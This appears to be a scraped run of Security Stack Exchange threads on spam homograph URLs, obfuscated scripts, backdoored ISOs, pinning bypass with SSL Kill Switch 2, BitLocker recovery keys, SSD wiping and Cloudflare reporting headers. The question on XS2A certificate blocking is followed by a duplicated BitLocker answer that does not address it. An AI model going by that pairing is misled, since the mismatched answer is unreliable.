This is truly crazy. I received a SPAM email in which there is a URL crafted from apparent Unicode characters that surprisingly exist for italic/bold letters, which when I reported it to Google's spam collector using Thunderbird's Report Spam Email feature it had already been converted to ASCII letters, therefore the URL was not properly reported. Here is the Unicode version: <base href="http://.COM"> Notice! These characters are bold/italic NOT because I selected to make them so, but because Unicode bizarrely contains bold/italic letters. See the hex values here: 0011660 e > < / t i t l e > < b a s e sp 3e65 2f3c 6974 6c74 3e65 623c 7361 2065 e > < / t i t l e > < b a s e 0011700 h r e f = " h t t p : / / p gs em 7268 6665 223d 7468 7074 2f3a f02f 999d h r e f = " h t t p : / / 360 235 231 0011720 * p gs em / p gs em # p gs em em p gs em f0aa 999d f0af 999d f0a3 999d f099 999d 252 360 235 231 257 360 235 231 243 360 235 231 231 360 235 231 0011740 ' p gs em sub p gs em ( p gs em ( . C O f0a7 999d f09a 999d f0a8 999d 2ea8 4f43 247 360 235 231 232 360 235 231 250 360 235 231 250 . C O Can a URL actually contain these Unicode characters, or will all browsers convert them to ASCII? Whether ASCII or Unicode, ping resolves this to 185.86.76.164. Why do these Unicode characters exist in the first place? Whoever requested bold/italic letters?
What you have here are mathematical symbols, see output from unicode text analyzer : Browser Codepoint Name # Fonts Script U+1D66A MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL U 12 Common U+1D66F MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL Z 12 Common U+1D663 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL N 12 Common U+1D659 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL D 12 Common U+1D667 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL R 12 Common U+1D65A MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL E 12 Common U+1D668 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL S 12 Common U+1D668 MATHEMATICAL SANS-SERIF BOLD ITALIC SMALL S 12 Common These symbols are considered equivalent in terms of Unicode to the respective "normal" characters, i.e. u, z, n, ... . When dealing with a URL containing Unicode clients will first do such a Unicode normalization step and if it after that still contains non-ASCII characters (not the case here) it will convert it as Punycode . ... it had already been converted to ASCII letters, therefore the URL was not properly reported Since it was correctly normalized it is the actual relevant URL as a browser would access it. Thus it was properly reported. But, it is even more complicated than this fairly simply explanation. For the details see the answer from IMSoP .
{ "source": [ "https://security.stackexchange.com/questions/254101", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264343/" ] }
254,257
I created my own anti-adblock system, that does something similar to services like BlockAdblock except mine goes about Adblocker detection in a different manner (and so far cannot be bypassed like ones such as BlockAdblock). If you go to my Anti-Adblocker's page and generate some example anti-adblock code you'll notice it's all obfuscated (BlockAdblock also does this) which I've done to make it harder for filters and bypassing methods to be developed for it. The code cannot be unobfuscated or tampered with/edited (doing so will cause it to not work). Each generation of this obfuscated anti-adblock code is unique, but they all perform the same action. I can see that some potential users of my tool may not trust it, as they can't determine exactly how it works - Am I able to prove to my users that the generated code is not malicious without revealing the actual unobfuscated source? (because if I were to reveal the unobfuscated source code it would defeat the whole purpose of obfuscating in the first place)
How can I prove to users that my obfuscated code is not malicious without unobfuscating? Probably, you can't. Maybe, if trusted persons were willing to audit your code (subject to NDA etc) and sign a static release with their PGP keys, then possibly more people would be willing to install your script with the confidence that it has been vetted by people who know what they are talking about... In this world everything is based on trust and reputation . So my advice, if you want to pursue a career in programming, would be to establish that trust and build your reputation from now on. Consider doing some open source code too , and publish it on platforms like GitHub with a liberal license. And I think you already have a few repos on GitHub actually, so don't hesitate to link to your previous work. If people can see your history and evaluate the quality of your coding practices (though terrifying when you think about it, these are the rules of the game...), they might be more willing to trust your code. Maybe one day you will work in a software company, or create one, and you will sell closed-source, compiled code like MS-Windows. If your reputation is good enough, if your product is good enough, stable and priced right, your customers will accept it just like they buy other software products they need even though they will never see the source code. Just curious, but have you tried online JavaScript deobfuscators like this one for example? Is your code sufficiently obscure yet after going through those tools? What you have achieved is still security by obscurity, and JavaScript code can be traced with debuggers too. So, someone who has time on their hands and enough experience can figure out how it works. After all, this is client-side code which is not even compiled. This can't be the most difficult reverse engineering job assignment on Earth. I wouldn't worry too much about this at this point, my worry is rather that your invention is time-sensitive , and could even be rendered obsolete by a future version of Firefox or Chrome etc. Defeating adblockers is a never-ending race and everything you make in this area has a limited shelf life.
{ "source": [ "https://security.stackexchange.com/questions/254257", "https://security.stackexchange.com", "https://security.stackexchange.com/users/244539/" ] }
254,383
Recently I got into an exchange with someone on social media about the security of Linux versus OSX and Windows. I stated that it is possible (and probable) that someone could code a low level back door ( or whatever pesky malware they desire), and put it into the open source Linux code they downloaded, as well as add all of the proprietary software that Ubuntu has; compile it to an iso and label it as “UbuNtU”. This new iso would install an OS that would look and feel like the real ubuntu, however it would have a back door that nobody could see. This would require a faked checksum as well, but that is somewhat besides the point because it can be faked too. (also the user might be just given a usb from a trusted source with the fake iso). My question is straightforward, could somebody create a fake Ubuntu with a back door by compiling the open source software into an iso and labeling it as “UbUnTu”. I would also like to add that this can be done with OSX and Windows however it would be much more difficult due to that fact that neither of these are open source! I strongly believe that open source software is more vulnerable to hackers point blank!
If an OS is open source or not is not the important factor if someone could build a malicious installer image. Recent versions of Windows use a technique that bases on WIM images which can be generated from existing Windows installations just like a backup software creates an image. Therefore it is pretty easy to generate a malicious Windows image, just capture an existing Windows installation that has been prepared with malware. The same is true for Linux based OS like Ubuntu. Therefore no matter what OS you install it is important only to use installer respectively ISO images that are directly downloaded from a trusted source using a secure channel like HTTPS, usually directly from the manufacturer or alternatively if you can verify the authenticity e.g. using a GPG signature.
{ "source": [ "https://security.stackexchange.com/questions/254383", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264865/" ] }
254,412
I've worked on places where the admins have disabled desktop personalization on Windows for settings like: changing desktop background and lock screen images local themes - no high contrast for example fonts What are the risks of these settings?
Changing them to other Windows defaults would pose no security risk. Allowing people to install fonts or screensavers from third parties poses a HUGE security risk. However, it's most likely these things are locked down not for security reasons but for conformity reasons. If you are rolling out thousands of computers, less options means less things to troubleshoot down the road. If you cant change the screen contrast, you will never get a phone call to tech support saying that the screen contrast is "broken". More Information on Malicious Fonts
{ "source": [ "https://security.stackexchange.com/questions/254412", "https://security.stackexchange.com", "https://security.stackexchange.com/users/206426/" ] }
254,503
I have certificate pinning implemented in my iOS and Android apps. But when apps were pen-tested, we got the report from the pentester saying SSL implementation is weak in both the apps and can be easily bypassed using an SSL by-pass tool. For iOS it was revealed that the SSL by pass tool was the notorious SSL Kill Switch 2 app. Now as far as I have googled, the SSL Kill Switch 2 app exploits the OS level weakness to bypass the pinning check altogether. Our team is looking into solutions to prevent or at least detect the bypassing. And one of the solutions coined was to use public key pinning instead of certificate pinning. Now as per my understanding, since SSL Kill Switch 2 works on OS level, it doesn't matter if we pin the certificate or the public key (or public key hash). It's always gonna bypass. So I wanted the advice of someone who has gone through this situation or has the expertise. If its worth implementing public key (or public key hash) pinning instead of the certificate pinning. Do my app stand a chance against pentest after the change?
Unless you specified that your software has to be secure against TLS interception even in the case of a jailbroken/rooted machine - which I hope you didn't, because that's impossible and a fool's errand to attempt - your pentester has... no idea what they're talking about and I hope you didn't pay them much for it. SSL Kill Switch 2 isn't a weakness in your SSL implementation, and it isn't a vulnerability in general. It's a tool for - on a fully rooted device - straight-up modifying your app's use of system libraries. It in no way qualifies as an app vulnerability, for the following reasons: The "attacker" needs to already have control of the operating system (not even normal user control, but actually root privileges). There is no possibility of securing a user-space app against a malicious OS. It requires malicious action on the part of the ostensible victim of any attack (the user, whose app login tokens or whatever are supposedly at risk). Unless you're trying to keep stuff in your app secret even from the user of jailbroken phones - which, again, indicates some bad choices in your design, and a lot of wasted time in your future trying to implement unspoofable jailbreak detection and/or snake-oil code obfuscation - pinning is to protect the user; it's incoherent to think of them as the attacker of their own secrets. The actual attackers can't do this. On a non-jailbroken phone, apps can't modify each other (or system libraries) at all. Even on a jailbroken phone, apps are still secure against remote attacks (at least, to the extent that the OS is secured against remote code execution in general; if the user has SSH enabled with a weak password, that's a vulnerability but it isn't your vulnerability). An "SSL pinning bypass" implies that an attacker is able to get your app to make an insecure connection, and even jailbreaking doesn't do that unless the attacker's code is already executing on the device. There's nothing wrong with your code. It's quite reasonable to assume that your app will operate in an environment where the system TLS APIs do, in fact, create secure connections (and allow you to pin the cert or key of the server, as per their API contract). You could do something like bundle your own copy of OpenSSL and use that for the connection, instead of the system library, but you don't need to and it wouldn't really help anyhow (the "pentester" would just modify that instead). Don't get me wrong, actual pentesters test on jailbroken devices specifically so they can do things like run SSL Kill Switch and disable pinning (or TLS in general). But that doesn't go in the report as a vulnerability. It's a way to find vulnerabilities - such as that your app is using hardcoded secrets, or is vulnerable to deserialization attacks, or that your server is vulnerable to an authorization bypass, or so on - but it isn't itself a vuln. Saying it is would be like saying a web app is vulnerable to XSS because the user can install an extension that injects scripts into the page. This is obvious, unavoidable, not your fault, and outright stupid to flag as an issue unless you're somehow trying to hide secrets even from the app's users.
{ "source": [ "https://security.stackexchange.com/questions/254503", "https://security.stackexchange.com", "https://security.stackexchange.com/users/264644/" ] }
254,576
Why don't some services offer Google/Facebook/Apple/Twitter login? Namely Crypto exchanges. I assume they want as many users as possible & this is a great way to get more. Is there some sort of security vulnerability associated with them? Edit: For Google & Apple login since both offer email services (gmail & icloud), offering the login button for these is the same thing as asking them to verify their email address. Assuming all you do on the login buttons is get the verified email address (which is all you need). Of course you'd still want 2FA
There are a variety of reasons that a company may not want to offer a federated login option. Some of them include the following: People don't necessarily protect their social media accounts very well. A company may want the ability to require a strong password or 2FA to log in, and that's harder to do when you use a third-party login. Also, services may not want the compromise of your social media account to be a compromise of their account. Some third-party login providers provide access to email addresses, and some don't. Apple uses a custom email. For situations where a service needs access to an email, whether for reasons of identity (e.g., GitHub and associating commits with accounts), fraud and abuse prevention, or less ethical reasons (e.g., non-confirmed opt-in marketing or other types of spam), a third-party login may not be sufficient. Depending on the way the third-party login provider works, you may end up with only a username, or a fixed ID as a result of the login information. If you store the username and not the ID, then you have a problem if the original owner deletes their account and someone else creates one named the same thing. If you don't implement third-party login, this doesn't happen. In the specific case of cryptocurrency exchanges, typically you are going to have to provide some sort of financial information to conduct business, and often additional information for local know-your-customer requirements. In many jurisdictions, these laws are very strict. Since you are already providing a good deal of information, much of which is quite sensitive, a custom username and password wouldn't be seen as very burdensome. Some services are highly regulated and must meet audit requirements, such as those from companies working in the financial industry or those selling to governments. These audits take a long time, involve a lot of personnel, and tend to be extraordinarily expensive. Adding third-party login increases the scope of the audit and makes other people's security or compliance problems the company in question's problems, and they would like to avoid that. Of course, these are some general reasons. Individual companies may have other reasons, but we have no way of knowing what they are.
{ "source": [ "https://security.stackexchange.com/questions/254576", "https://security.stackexchange.com", "https://security.stackexchange.com/users/124704/" ] }
254,635
While doing some encryption work on drives I found that BitLocker keeps making these "recovery keys". No other encryption software I used did that so it annoyed me and made me biased perhaps. While laboring with safe storage of these "recovery keys", I suddenly realized how small they looked and now I started suspecting a more serious problem. I searched for how they worked and found the post How does Microsoft's BitLocker Recovery Code work? . It says it is just another encryption key, like the password. Now my passwords are 128-character alphanumerics with special characters that I generate using algorithms with some random input (e.g., my mouse movements). My estimate is that it is 7 bit per character = 896 bits. If half of it is random, the key is way above 256 bits and suits the industrial standards. The recovery key on the other hand is 48 digits, at most log 2 (10^49) = 163 bit, if my math is correct. A 163-bit key seems mighty small and is certainly not up to an industrial standard of 256 bit. But then something else struck me. When generating the key I didn't move neither my mouse, nor pressed keys, nor was my computer connected to the Internet. What else could Windows use for randomness? Thermistors on the chipset? Too slow, the key was printed out within a few seconds. So it must be a pseudorandom 163-bit key. The time to crack anything below 128 random bits falls off the cliff so under the worst case scenario it could be cracked very quickly using regular GPUs. So it adds up to two questions: Can a BitLocker-locked drive be brute-forced within hours by guessing the recovery key by an actor with a supercomputer? With a couple of GPUs? (assuming Microsoft put as much effort as possible into that pseudo-random recovery key and didn't insert any back doors by reducing the already-miserable amount of randomness there) Is there an option to disable BitLocker recovery keys? Answer to question 2. (I hope) I found a way to disable the recovery keys! In Windows, search Run → gpedit.msc → Computer Configuration → Administrative Template → Windows Components → BitLocker Drive Encryption → Fixed/Removable Data Drives → Choose how fixed/removable drives can be recovered . Reboot. Recreate the drives. I was happy about my discovery for a minute, but I realized if the answer to question 1 is yes, it might just create the recovery key in the background, but never display, save, or log it. The vulnerability would work just the same. I was actually not able to disable the recovery key entirely. BitLocker just fails with an error saying there is no option to create a recovery key. I did switch to the 256-bit recovery key, which somebody on some forum says ought to be FIPS compliant. It saves it as a hidden system file on a USB disk.
Can a Bitlocker-locked drive be brute-forced within hours by guessing the recovery key by an actor with a supercomputer? With a couple of GPUs? (assuming Microsoft put as much effort as possible into that pseudo-random recovery key and didn't insert any backdoors by reducing the already-miserable amount of randomness there) Not even remotely. First of all, you say "miserable amount of randomness" but that, frankly, just belies that you have no idea what large amounts of entropy are like. 256-bit encryption is common not because 128-bit is insecure, but because 256-bit is fast enough on modern CPUs that there's no reason to use smaller keys. It is, however, an ABSURD amount of overkill from a security perspective, at least against conventional computers (it might be meaningfully more secure against quantum computers, if those ever get anywhere). 128 bits of entropy means 2^128 possibilities, and 128 bits of entropy is still an extremely common cryptographic key strength (though depending on the algorithm, this sometimes requires the keys to be longer than 128 bits). 2^128 is about 3.4 * 10^38 (EDIT: fixed a typo in the math) . To consider how many that really is, in terms of total computation required, consider: For certain kinds of operations, the most common supercomputers today are GPUs; for example, a high-end modern GPU can compute tens of billions (10^10) of cryptographic hashes per second. Let's suppose, for the moment, that you could break a BitLocker recovery key by computing 2^128 SHA1 cryptographic hashes. (This is almost certainly false, even if the keys actually only have 2^128 entropy, much less any more.) Let's further suppose that you are the NSA or some such, and can buy up the entire annual production of high-end GPUs ( somebody is buying them all, these days...). Let's say it's about 38 million (this is actually almost certainly too high; it's a decent guess for the total number of GPUs, most of which are way less powerful than the high-end ones). So, 38M (3.8 * 10^7) powerful GPUs, each capable on average of 10^10 SHA1 operations per second. That's a total of 3.8*10^17 hashes per second. That's still about a factor of 10^21 seconds! How long is that? Almost 32 trillion years , which is roughly 2500 times as long as the universe has existed so far. Let's be honest, you can't afford to wait 2500 times the current age of the universe. Nor can your attacker. They might be able to shave a couple orders of magnitude off that estimate by buying specialized hardware rather than off-the-shelf processors, but even if they manage a speedup of 1000x... that's still multiple age-of-the-universe lifetimes. Just to perform one operation 2^128 times. Using several billion dollars worth of hardware. I think your recovery key will be OK . Is there an option to disable Bitlocker recovery keys? In addition to the option you already found that makes Windows not force there to be a key created each time you use the BitLocker GUI, you can also delete "protectors" including the recovery key using the command-line manage-bde.exe tool. manage-bde -protectors -delete C: -Type RecoveryPassword Just, before you run off to execute that little command, take a break to consider. After all, you've got more than a few age-of-the-universe timescales to consider it in.
{ "source": [ "https://security.stackexchange.com/questions/254635", "https://security.stackexchange.com", "https://security.stackexchange.com/users/155724/" ] }
254,644
I am an Open Banking enthusiast and I'm studying the Berlin Group's XS2A framework these days. There, it has an error code called CERTIFICATE_BLOCKED. As the description of it, it states, "Signature/corporate seal certificate has been blocked by the ASPSP or the related NCA." What I need to understand is what is the difference between certificate "blocking" and revoking? I understand the concept of why certificate authorities revoke certificates. We also can validate the certificate revocation statuses using OCSP and CRL endpoints online. Following are what I need to understand, What is the difference between certificate "blocking" and "revoking"? Is blocking temporary? Can a blocked certificate be unblocked by a CA or an ASPSP (ASPSP is the word for a bank in Open Banking context)? Can anyone block a certificate (ASPSP/NCA)? Is there a way to check the certificate blocking status like OCSP and CRL endpoints? PS: I've also looked up RFC5280 , hoping there might be an explanation. I couldn't find anything about certificate blocking other than from the XS2A Berlin Open Banking specification.
Can a Bitlocker-locked drive be brute-forced within hours by guessing the recovery key by an actor with a supercomputer? With a couple of GPUs? (assuming Microsoft put as much effort as possible into that pseudo-random recovery key and didn't insert any backdoors by reducing the already-miserable amount of randomness there) Not even remotely. First of all, you say "miserable amount of randomness" but that, frankly, just belies that you have no idea what large amounts of entropy are like. 256-bit encryption is common not because 128-bit is insecure, but because 256-bit is fast enough on modern CPUs that there's no reason to use smaller keys. It is, however, an ABSURD amount of overkill from a security perspective, at least against conventional computers (it might be meaningfully more secure against quantum computers, if those ever get anywhere). 128 bits of entropy means 2^128 possibilities, and 128 bits of entropy is still an extremely common cryptographic key strength (though depending on the algorithm, this sometimes requires the keys to be longer than 128 bits). 2^128 is about 3.4 * 10^38 (EDIT: fixed a typo in the math) . To consider how many that really is, in terms of total computation required, consider: For certain kinds of operations, the most common supercomputers today are GPUs; for example, a high-end modern GPU can compute tens of billions (10^10) of cryptographic hashes per second. Let's suppose, for the moment, that you could break a BitLocker recovery key by computing 2^128 SHA1 cryptographic hashes. (This is almost certainly false, even if the keys actually only have 2^128 entropy, much less any more.) Let's further suppose that you are the NSA or some such, and can buy up the entire annual production of high-end GPUs ( somebody is buying them all, these days...). Let's say it's about 38 million (this is actually almost certainly too high; it's a decent guess for the total number of GPUs, most of which are way less powerful than the high-end ones). So, 38M (3.8 * 10^7) powerful GPUs, each capable on average of 10^10 SHA1 operations per second. That's a total of 3.8*10^17 hashes per second. That's still about a factor of 10^21 seconds! How long is that? Almost 32 trillion years , which is roughly 2500 times as long as the universe has existed so far. Let's be honest, you can't afford to wait 2500 times the current age of the universe. Nor can your attacker. They might be able to shave a couple orders of magnitude off that estimate by buying specialized hardware rather than off-the-shelf processors, but even if they manage a speedup of 1000x... that's still multiple age-of-the-universe lifetimes. Just to perform one operation 2^128 times. Using several billion dollars worth of hardware. I think your recovery key will be OK . Is there an option to disable Bitlocker recovery keys? In addition to the option you already found that makes Windows not force there to be a key created each time you use the BitLocker GUI, you can also delete "protectors" including the recovery key using the command-line manage-bde.exe tool. manage-bde -protectors -delete C: -Type RecoveryPassword Just, before you run off to execute that little command, take a break to consider. After all, you've got more than a few age-of-the-universe timescales to consider it in.
{ "source": [ "https://security.stackexchange.com/questions/254644", "https://security.stackexchange.com", "https://security.stackexchange.com/users/257252/" ] }
254,940
Opening a PDF link in the browser (e.g. google chrome with the ootb PDF viewer plugin) apparently indicates that when the PDF is hosted on a cloudflare-facing domain there is additional data present in the embed code. Inspecting the page source of a displayed PDF file with chrome dev tools shows some 'reporting' URL when the PDF is behind cloudflare e.g. https://a.nel.cloudflare.com/report/v3?s=%2BW057P981N7Esg... (see the second code block). PDF embed of a file NOT served via cloudflare: <embed id="plugin" type="application/x-google-chrome-pdf" src="https://www.w3.org/WAI/ER/tests/xhtml/testfiles/resources/pdf/dummy.pdf" stream-url="chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/f02f891e-7fd9-4857-8a34-f4e05abb87f8" headers="accept-ranges: bytes cache-control: max-age=21600 content-length: 13264 content-type: application/pdf; qs=0.001 date: Sun, 05 Sep 2021 08:17:57 GMT etag: &quot;33d0-438b181451e00&quot; expires: Sun, 05 Sep 2021 14:17:57 GMT last-modified: Mon, 27 Aug 2007 17:15:36 GMT strict-transport-security: max-age=15552000; includeSubdomains; preload x-backend: ssl-mirrors " background-color="4283586137" javascript="allow" full-frame="" pdf-viewer-update-enabled=""> PDF embed for a file that IS served via cloudflare: <embed id="plugin" type="application/x-google-chrome-pdf" src="https://www.cloudflare.com/static/839a7f8c9ba01f8cfe9d0a41c53df20c/cloudflare-cdn-whitepaper-19Q4.pdf" stream-url="chrome-extension://mhjfbmdgcfjbbpaeojofohoefgiehjai/fab5433b-5189-4469-91bb-fe144b761c7f" headers="accept-ranges: bytes age: 105287 alt-svc: h3-27=&quot;:443&quot;; ma=86400, h3-28=&quot;:443&quot;; ma=86400, h3-29=&quot;:443&quot;; ma=86400, h3=&quot;:443&quot;; ma=86400 cache-control: max-age=8640000 cf-cache-status: HIT cf-ray: 689e1d381a951501-MAD content-length: 921473 content-type: application/pdf date: Sun, 05 Sep 2021 08:33:41 GMT etag: static/839a7f8c9ba01f8cfe9d0a41c53df20c/cloudflare-cdn-whitepaper-19Q4.797a721498.pdf expect-ct: max-age=604800, report-uri=&quot;https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct&quot; nel: {&quot;success_fraction&quot;:0,&quot;report_to&quot;:&quot;cf-nel&quot;,&quot;max_age&quot;:604800} report-to: {&quot;endpoints&quot;:[{&quot;url&quot;:&quot;https:\/\/a.nel.cloudflare.com\/report\/v3?s=Bi6bZw6jf1FJoimuy2arirenUDiwyZX%2B%2B1Ty506xD9qMJ5UggIvZAy2h8gKogsJORkPlWdnZ12udf6CN%2BadaEF0FRKFAyZQabI6xkui0%2FrV%2BaCFsp7BmbEHnoLk0HPmJ6pMeMQ%3D%3D&quot;}],&quot;group&quot;:&quot;cf-nel&quot;,&quot;max_age&quot;:604800} server: cloudflare strict-transport-security: max-age=31536000 vary: Accept-Encoding x-content-type-options: nosniff x-frame-options: SAMEORIGIN x-xss-protection: 1; mode=block " background-color="4283586137" javascript="allow" full-frame="" pdf-viewer-update-enabled=""> Question Does this imply that cloudflare is rewriting the HTML source for PDF embeds and tracking PDF files opened through the browser PDF plugins? What are the security/privacy implications of this? Would disabling the browser PDF embed plugin reduce the amount of data collected by cloudflare? What is particularly confusing is that the <embed/> code is supposedly generated by the PDF browser plugin and NOT from the incoming response so how can this rewriting be happening specifically for cloudflare?
This is not about HTML. This is the HTML of Google Chrome, and Cloudflare controls the response HTTP headers, as it should, since it's the HTTP server responding to the request. The Report-To header is part of Content Security Policy security features.
{ "source": [ "https://security.stackexchange.com/questions/254940", "https://security.stackexchange.com", "https://security.stackexchange.com/users/88855/" ] }
255,136
I held every chip (without desoldering, they were still onboard) in a lighter flame for a minute or two. They started "popping" a little if that indicates anything. Then I drove a nail into every chip (approximately through the center) with the use of a hammer. Obviously, before all of that, I did a software wipe - ATA Secure Erase using Parted Magic. If any data survived the process of Secure Erase (the drive was non-SED I am afraid, even though it was one of the newer ones), is physical destruction as described above sufficient to make any recovery attempt essentially impossible?
This approach to data destruction is theatrical and has little grounding in reasonable threat models. The most effective policy to ensure safe and responsible disposal of SSDs is: Use full-disk encryption (e.g. BitLocker, dm-crypt) for the whole lifetime of the disk, and do not write plaintext data to it. Utilise ATA Secure Erase to wipe the disk. Modern SSDs have transparent encryption at the cell level, and ATA Secure Erase simply discards the key and generates a new one. This renders the data on the underlying flash unreadable. If you are paranoid, perform a single-pass random wipe over the SSD afterwards. This is rarely justifiable in practice, and is not a safe sanitisation practice on its own due to flash wear-levelling and overprovisioning. It also causes wear on the flash cells, which is why Secure Erase exists in the first place. If you're already at the point where you're disposing of the disk, and you forgot step 1, then you're in a worse position than you could be, and this is a lesson for next time. Regarding step 3, the thing about performing random wipes on SSDs is that it is only justifiable if you're trying to gain additional protection against flawed Secure Erase implementations. However, this only makes sense if you presume that the ATA Secure Erase key cycling implementation is the only security boundary preventing an attacker from reading your data, and that an attacker will attempt to perform chip-level data recovery on your disk. Consider the following: If you're using full-disk encryption (FDE), you've already got a concrete layer of protection, so even if Secure Erase completely fails you don't need to worry about it all that much. But if you use ATA Secure Erase and you can't see the data on the drive any more, that means it did something , at least, which is good enough. Regardless of whether or not you're using FDE, if you're a regular person, attackers who have the capability to attack ATA Secure Erase implementations aren't interested in you, and do not stand to profit from using those capabilities on you, so you don't need to worry about it as long as the key is changed to literally anything else (if it wasn't, you could still see all your data). If you work in the type or organisation (government) where such an attack is relevant, you're already using FDE, and you're not getting your advice on Stack Exchange, so none of this is relevant to you and this entire answer is moot. Whichever way you look at it, ATA Secure Erase is secure enough for an average person or business even if it is not implemented in a cryptographically secure manner . For it to fail as a wiping mechanism, it either has to do absolutely nothing (which is immediately obvious, because the data will still be there), or an attacker has to reverse engineer the SSD firmware, discover the weak key generation mechanism, and perform chip-level data recovery to leverage that attack. As we already established, no such attacker exists in the average person's threat model. This is not the same as saying "everyone should just go with 'good enough' security all the time and not bother with more advanced mitigations" - that is obviously bad advice. What I mean is that any security decision you make that results in cost or waste should be justified and proportional to the security benefit. Physical destruction of storage media is rarely necessary, highly wasteful, and should be reserved for scenarios where threat modelling demonstrates a significant safety risk. Many governments (and businesses) have operated excessively paranoid so-called "data destruction" policies for the past decades, but have more recently re-assessed their approach due to the extreme overheads involved. The historical practices of multi-pass wipes, including utterly ludicrous 35-pass methods, are without merit on modern storage media. At best they do nothing more than wear out the storage device, and at worst they do not effectively remove sensitive information from the device (e.g. due to overprovisioning and wear levelling). Peter Gutmann himself, who wrote the paper that spawned the "Gutmann method", has this to say on the topic: In the time since this paper was published, some people have treated the 35-pass overwrite technique described in it more as a kind of voodoo incantation to banish evil spirits than the result of a technical analysis of drive encoding techniques. As a result, they advocate applying the voodoo to PRML and EPRML drives even though it will have no more effect than a simple scrubbing with random data. In fact performing the full 35-pass overwrite is pointless for any drive since it targets a blend of scenarios involving all types of (normally-used) encoding technology, which covers everything back to 30+-year-old MFM methods (if you don't understand that statement, re-read the paper). If you're using a drive which uses encoding technology X, you only need to perform the passes specific to X, and you never need to perform all 35 passes. For any modern PRML/EPRML drive, a few passes of random scrubbing is the best you can do. As the paper says, "A good scrubbing with random data will do about as well as can be expected". This was true in 1996, and is still true now. Highly disproportionate and extreme approaches to data destruction gained popularity after the DoD 5220.22-M standard was declassified, which was quickly exploited by vendors of disk wiping software to market their products as "military grade". However, people who were involved in the DoD data destruction standards later admitted that almost none of it was scientifically justified, and was instead written with the goal of appeasing military paranoia and gaining buy-in from non-technical higher ups - hence why it was named "data destruction", rather than "media sanitisation". The excesses of past policies ultimately resulted in a reduction of security posture through security fatigue and avoidance of onerous requirements. More modern standards recognise this, and take a far more scientific approach. For media sanitisation I recommend reading and following the advice in NIST SP 800-88 Rev.1 . It is very accessible and provides clear advice specific to each type of storage technology. Appendix A contains the most quickly digestible portion of the advice, but you should refer to the guidance in section 4 of the document with regard to which media sanitisation approach you take. Section 2 also provides useful background information. It is extremely difficult to justify physical destruction of storage media for any regular citizen. To be blunt, it is delusional to expect that a threat actor exists that has the technical capability to perform flash-level data recovery, the motivation and resources to utilise that capability effectively, and proportional motive to justify targeting your data specifically. Unless you're a political dissident or organised criminal, these scenarios are pure fantasy. If you are in one of those groups of interest, extreme approaches to data destruction are bad for operational security because they draw unnecessary attention. I recommend reading James Mickens' This World Of Ours for a wonderfully humorous take on misguided and overly convoluted security practices: In the real world, threat models are much simpler. Basically, you’re either dealing with Mossad or not-Mossad. If your adversary is not-Mossad, then you’ll probably be fine if you pick a good password and don’t respond to emails from [email protected]. If your adversary is the Mossad, YOU’RE GONNA DIE AND THERE’S NOTHING THAT YOU CAN DO ABOUT IT. The Mossad is not intimidated by the fact that you employ https://. If the Mossad wants your data, they’re going to use a drone to replace your cellphone with a piece of uranium that’s shaped like a cellphone, and when you die of tumors filled with tumors, they’re going to hold a press conference and say "It wasn’t us" as they wear t-shirts that say "IT WAS DEFINITELY US," and then they’re going to buy all of your stuff at your estate sale so that they can directly look at the photos of your vacation instead of reading your insipid emails about them. Attempted destruction of an SSD with a lighter is a perfect example of theatrical security policies that feel secure without actually doing anything useful. To destroy an SSD with heat, you generally need to heat them to a temperature far in excess of what a simple lighter can provide. Even if you heat the flash memory ICs directly, much of the heat you're applying to the package will be dissipated by the lead frame and component legs, meaning that the die temperature will be far lower than that of the flame. It is also important to understand that data retention in flash cells at high temperatures is not best modelled by a "failure point". The behaviour is better modelled as a degradation factor. Flash cells do not have an infinite storage lifetime while unpowered - over time, the cells will start to lose their state. The period between the last powered operation and the time at which the cells lose enough of their state to result in data corruption is known as the data retention rate. For most consumer SSDs, the retention rate is usually around a year, when the drive is stored at the recommended temperature range. The degradation factor is the measure of how much faster the degradation occurs at a particular temperature. In the recommended storage temperature range, the degradation factor is close to 1. A degradation factor of 2 means that the data degrades in half the time. As the temperature rises, the degradation factor increases. The exact degradation factor at a given temperature is device-specific. For NAND flash, you should expect to see a graph similar to the following: (source: Achieving Extensive Data Retention in High-Temperature Environments ) As the die temperature hits 80°C, the degradation factor exceeds 150. If the storage device under test has a standard retention rate of one year, a degradation factor of 150 reduces this to around 60 hours. If we take a crude linear extrapolation of this graph, beyond the 60°C point, we get a gradient of around 6/°C. If we presume that your lighter manages to get the die temperature to 500°C, this would produce a DF of around 2100. Dividing one year by 2100 gives us 4.2 hours, which is a rough guesstimate of how long you'd have to hold the flash chip over your lighter before it degraded to a significant level. If we're a bit more charitable and assume that your lighter can heat the chip to 1000°C, that brings the degradation factor up to 5850, which still means an hour and a half of heating. Per flash chip. To get an equivalent degradation to one year of being powered off, which does not mean complete loss. This is obviously not practical. If we go all the way up to high-heat butane lighters, and assume that none of the heat is dissipated, we get to about 1900°C in a tightly focused flame - far greater than that of a blowtorch. The DF stops being relevant here because the copper will melt, but if it was still relevant you'd need to heat it for around 46 minutes. Still, this does rather prove the point that it takes a whole lot of heat and/or time to make this kind of destruction approach useful. Putting a nail through the chips is certainly effective, but at a cost that makes absolutely no sense. If your SSD has failed to the point of being non-functional, and it still contains sensitive data (especially if you forgot to use FDE), sure, subject it to whatever physical destruction approach you like. Realistically, if you throw it away, nobody is going to try to read it by doing anything more than plugging it into a computer. There's no harm done in smashing up an already broken drive, other than the potential for injuring yourself in the process. It might even be cathartic. But if you physically destroy a functioning drive, you're just generating e-waste and costing yourself money for no tangible benefit.
{ "source": [ "https://security.stackexchange.com/questions/255136", "https://security.stackexchange.com", "https://security.stackexchange.com/users/267030/" ] }
255,378
I am connecting an Arduino Uno to the internet via ethernet (using the ethernet shield v2) and querying NTP time. Making requests to a NTP server is the only internet related thing it does. You can use the ethernet shield as an SD card to host data, I WILL NOT be doing that. It will only be querying NTP. I'm worried this IoT device will become a security target for my network. What attacks is it vulnerable to? And how do I secure such a low spec device? Note: I am not worried about physical attacks, the device will be locked away.
